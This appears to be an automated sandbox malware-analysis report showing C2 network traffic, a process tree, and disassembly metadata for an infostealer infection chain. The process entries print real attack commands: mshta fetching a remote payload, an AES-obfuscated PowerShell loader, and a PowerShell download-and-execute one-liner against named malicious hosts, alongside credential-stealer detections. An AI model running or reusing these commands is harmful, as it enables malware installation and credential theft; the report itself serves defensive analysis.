2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 1f fd 3b 90 2d bf b5 60 99 cb 30 6d 35 89 37 25 25 e7 e0 ae 12 ea ff 30 9b dc 86 2e 1c 17 05 43 a2 43 c5 60 77 e5 64 ca 72 1a 6a 63 82 57 d8 7e a8 ca 91 46 00 d5 5a 6c 40 57 03 f4 b1 0b bd a6 52 4c e8 0f 5d 0b fe c4 6f 4d c4 63 f4 3f fe 30 40 5b 84 2c ca 8a 7e 9a e8 92 9f 08 1b a9 a7 0e 4c c7 b6 25 91 34 e7 67 81 30 d5 2b c5 e6 8e f8 0e d3 ec 17 44 54 6b eb 85 02 95 6a c4 60 41 4c ad 38 43 8f 8d cc d5 99 b0 f2 20 e9 ba 13 79 90 27 d9 db e9 77 44 e9 03 eb b0 99 43 d3 e9 a1 7c 58 34 b4 c9 ec 41 d9 a4 b1 39 9e 50 44 65 0c aa 66 2e 77 2e 98 6e 27 3a c8 1f b1 de 4f 62 c9 42 a5 45 a6 b5 5f df 89 f7 a2 7b ee a2 cf 4e cb ef 9b 94 7c eb 90 26 48 4e a4 f9 cc b0 3b bc 6d 4d da 1d 0b 48 44 77 50 29 60 cf 22 5d 51 50 ac 53 15 1f 3d ed 9a ed b1 1f 63 71 f0 77 ef 93 dd Data Ascii: ;-`0m57%%0.CC`wdrjcW~FZl@WRL]oMc?0@[,~L%4g0+DTkj`AL8C y'wDC\|X4A9PDef.w.n':ObBE_{N\|&HN;mMHDwP)`"]QPS=cqw
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 43 db e8 6c 76 57 31 be 5f 83 10 30 9d 89 8d af f3 4f 3a ba dc 57 16 e5 9f fd 83 7e 6d bf ec e8 11 a1 ee f9 7b 3a 16 34 63 7e 26 4f 14 78 22 d2 04 1e 82 73 0e cb 8e ae 98 ef 58 28 00 74 70 4b 7b 60 c6 4b 84 63 28 22 bc b5 96 13 11 99 72 7c 23 d2 b7 04 5a ce 45 04 10 35 f6 b1 af b3 bb 0f 0d 33 f6 2f ec c3 87 7f a7 5e 69 fd 74 5a 45 3a 4b a8 e0 1b 0c 01 e2 29 21 27 6c 08 db 29 34 bb 58 2b c7 ba c7 75 30 e6 bc 0c d3 61 ed 01 ca dc 5d 3f 96 c0 1c 15 8b 0f 46 8c bf 60 84 11 99 83 87 b4 4f 58 b1 a5 91 ba 8c ee 76 92 da 13 f7 e0 4e 11 75 4a e3 3a cf c1 cd 58 6d 1c 6f e9 ff 4d 27 b9 28 42 a0 d2 78 8d fa 13 8c 2f 23 64 d1 0e e6 96 31 d3 8f cc ed d6 1d 70 70 ab d3 54 36 5b aa 6a 94 ac 62 1b 1e ba 99 ae f5 01 9b 7a ec 8a 90 6f 70 1d f8 7a 1c e3 53 a5 29 c8 e9 84 96 Data Ascii: ClvW1_0O:W~m{:4c~&Ox"sX(tpK{`Kc("r\|#ZE53/^itZE:K)!'l)4X+u0a]?F`OXvNuJ:XmoM'(Bx/#d1ppT6[jbzopzS)
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 5b e4 71 35 4e 16 16 a3 49 6b 46 9f 69 8c 9c e3 62 b3 1f d1 47 e0 5f 41 cc 5a 1e 42 db d6 22 61 72 7c f3 64 3b eb 26 d3 0d 75 c4 61 7b 2b c2 69 4e be 55 52 24 cf f0 19 ae a0 36 cd 71 db 89 d8 ad 13 fa 00 cf 4d c0 fb ed ff ae ee f2 d0 01 52 0f fc 27 56 70 51 01 9c 2a 20 5a 32 91 48 99 6a 43 89 cc 0e ac c2 5a e9 90 a4 29 24 9c 95 06 a9 6a 5a 93 52 a8 22 f9 5b 7d 32 29 3d ab 25 0c c4 32 25 af 3d 54 9a 19 14 68 1a 86 7f b3 12 bf 6f 9d ab 38 99 93 9b e9 55 e0 f8 9d 7b 83 ed a1 68 a1 2e 15 29 d7 19 c5 56 49 dd ec 99 5e 20 af 0d 98 ad 6b 37 74 0d f3 90 7b 55 5e 68 6a 25 d2 47 5f e1 0b dc 90 4d 69 79 58 46 cf 49 0a 53 aa 3d 45 9f e2 14 b6 bc d4 2e 61 a1 3b 36 cc ea a3 7b ad 15 a4 01 48 6a 7e 40 5f b3 e8 bb 62 43 72 f0 92 a2 a2 f7 c7 4d 98 ac 0b af 0e 79 30 c6 8d Data Ascii: [q5NIkFibG_AZB"ar\|d;&ua{+iNUR$6qMR'VpQ* Z2HjCZ)$jZR"[}2)=%2%=Tho8U{h.)VI^ k7t{U^hj%G_MiyXFIS=E.a;6{Hj~@_bCrMy0
2024-12-21 20:06:38 UTC	15331	OUT	Data Raw: 48 41 a2 e8 a3 58 b6 21 26 3c 16 72 2d a8 d2 8a a2 76 0e 86 b3 36 20 c5 fe 58 2f 0a b3 7c e2 33 db 65 af 2a 9c 92 25 b0 6b 22 b6 23 b8 00 c1 99 d2 1e cc 44 c7 be 7b d0 07 20 a6 8b 30 62 70 f2 dd 34 f7 38 10 e4 16 a8 fd d3 ca a8 7d f2 31 93 56 7b aa 3f 7b 6b d2 d8 a0 9f f4 70 33 91 f1 07 a3 37 d7 04 6e 57 e1 07 bf 0f eb 80 f2 1c 22 3b 23 63 97 e7 0d 43 f2 aa e1 b7 25 8f 00 bd 0b 9d 18 c7 93 9d e0 2a b1 32 02 1e 01 fc da 8a ce 5d 17 8f 33 3b 6d 05 a2 45 19 97 8a 56 9b f5 3f ac d3 7c 8a b7 d1 79 15 36 fe f1 37 6e 45 23 5d d0 29 2b 32 69 69 61 2b e2 b4 34 cf 56 f0 cd 25 6b 42 76 05 36 8d 3c 1c df be 4f 64 bb 2c 22 28 60 6c 4b d6 39 8a b3 29 e1 97 15 71 bb c6 2a 07 62 74 bd 12 4f 1b 44 62 80 d5 70 40 90 9a 2b 16 95 5d e3 31 e7 8d c5 5f 25 49 84 63 85 b8 64 f3 Data Ascii: HAX!&<r-v6 X/\|3e%k"#D{ 0bp48}1V{?{kp37nW";#cC%2]3;mEV?\|y67nE#])+2iia+4V%kBv6<Od,"(`lK9)q*btODbp@+]1_%Icd
2024-12-21 20:06:42 UTC	1144	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pcrvo1anccoub25bh7ov6goivp; expires=Wed, 16 Apr 2025 13:53:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abM3IGSsC96lhC1VQXfd%2FT8QlVgizjRDnO27VJIQqP2npV%2FEUTxACWV%2FMHPoaFTTGYsr3dng0lNv9hovvD25wtyOvEmb9IJ%2FiSA2hHPFZ5NHBkBdvawmH4FGh6saW%2FTYCMnQMGY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e6a3eb9334c-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129366&min_rtt=129309&rtt_var=27377&sent=351&recv=827&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1047675&delivery_rate=29560&cwnd=252&unsent_bytes=0&cid=b9e73c3a691d1035&ts=3948&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.11.20	49776	104.21.96.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:42 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: surmisehotte.click
2024-12-21 20:06:42 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d 26 68 77 69 64 3d 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--singl6&j=&hwid=71678163B129FD4CDB71E32F12885CB3
2024-12-21 20:06:50 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:06:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sab83s8nubpuf48ee6dc1hm32v; expires=Wed, 16 Apr 2025 13:53:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gP3gueWiGg4AxlIrtklXmDSaCelVWpvhMDZXrYtDZXsbrb7zjtNMzqEXVn8aj39CNFfHDVDSalOXC4SGYSMgISRsRn6CLdqgx1AQ0NPPw%2BYt8eiWwSOdmLZW2LguNnIMOeoSLsI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7e85985e334c-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=130286&min_rtt=130072&rtt_var=27820&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=985&delivery_rate=29200&cwnd=252&unsent_bytes=0&cid=fd3f79657e22b7d8&ts=7856&x=0"
2024-12-21 20:06:50 UTC	54	IN	Data Raw: 33 30 0d 0a 43 39 36 48 79 67 43 7a 4e 49 4b 6c 78 6c 69 39 6e 49 31 38 73 43 32 57 5a 2f 48 64 6f 63 46 65 4c 44 6a 76 42 70 65 44 45 70 56 51 67 77 3d 3d 0d 0a Data Ascii: 30C96HygCzNIKlxli9nI18sC2WZ/HdocFeLDjvBpeDEpVQgw==
2024-12-21 20:06:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:04:38
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
Imagebase:	0x6e0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:04:38
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff685670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:04:38
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	"C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
Imagebase:	0xe0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:04:41
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129)
Imagebase:	0xe40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:04:41
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff685670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:04:45
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Imagebase:	0xe40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:04:45
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff685670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	15:06:19
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x7ff78d9e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:06:23
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff66d350000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:06:25
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
Imagebase:	0x7ff66d350000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 070B0F9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Function 070B0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 2576, Parent PID: 2044COMMON

Executed Functions

Function 00948050 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6015d2967ad086741a330e5e117dddb9b96a2c995dca9830f60a64cc5ba7316d
Instruction ID: 3da5ffbdab8296b1d44ffac6b9d272819705dc50b8758523643108b5e067f17c
Opcode Fuzzy Hash: 6015d2967ad086741a330e5e117dddb9b96a2c995dca9830f60a64cc5ba7316d
Instruction Fuzzy Hash: A9B14F70E00609CFDF14CFA9D885BAEBBF6BF88744F148529D815A7294EB749846CF81

Function 00948920 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9381c3e9648ff0cc5f904499d325ced60bb3cbcd24c5dd7997de37f3b0048c
Instruction ID: 1d6a646b0e49c420607bf5e418b31b51d27f6cb4155c00e8411cb860aae1e32e
Opcode Fuzzy Hash: 9e9381c3e9648ff0cc5f904499d325ced60bb3cbcd24c5dd7997de37f3b0048c
Instruction Fuzzy Hash: 3EB16E70E002098FDF14CFA9D881BAEBBF6BF88354F14852AD815E7294EB749845CF91

Function 07091ED0 Relevance: 23.2, Strings: 18, Instructions: 733COMMON

Download Yara Rule

Strings

4[,j, xrefs: 07092656
@b,j, xrefs: 07092173
4\,j, xrefs: 070921DB
4[,j, xrefs: 070925DA
@b,j, xrefs: 07091FDD
4[,j, xrefs: 0709213A
4[,j, xrefs: 070920E4
4[,j, xrefs: 07092752
@b,j, xrefs: 07091FE7
4[,j, xrefs: 070926E8
4[,j, xrefs: 07092144
4[,j, xrefs: 0709264A
4\,j, xrefs: 070921E7
4[,j, xrefs: 070926F4
4[,j, xrefs: 070925CE
4[,j, xrefs: 07092748
4[,j, xrefs: 070920D8
@b,j, xrefs: 07092169

Memory Dump Source

Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

API ID:
String ID: 4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4\,j$4\,j$@b,j$@b,j$@b,j$@b,j
API String ID: 0-4194018717
Opcode ID: 7233c3a514a08a9321444956dcb0dca2144fa4909eed9dc518e21061f1e836e1
Instruction ID: 7562ae89fd38f28f57df29231bd9fa9846a23f4737de1540101983b7c4c3be5a
Opcode Fuzzy Hash: 7233c3a514a08a9321444956dcb0dca2144fa4909eed9dc518e21061f1e836e1
Instruction Fuzzy Hash: 4342B070B40209EFDB58DBA4C454B6EBBF2BB89304F248269D406AF355CF71DC419B96

Function 07091AD8 Relevance: 10.2, Strings: 8, Instructions: 236COMMON

Download Yara Rule

Strings

4\,j, xrefs: 07091C61
@b,j, xrefs: 07091CB3
+j, xrefs: 07091BAF
+j, xrefs: 07091BB9
4\,j, xrefs: 07091C6D
4\,j, xrefs: 07091CEE
4\,j, xrefs: 07091CFA
@b,j, xrefs: 07091CA9

Memory Dump Source

Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7090000_powershell.jbxd

Similarity

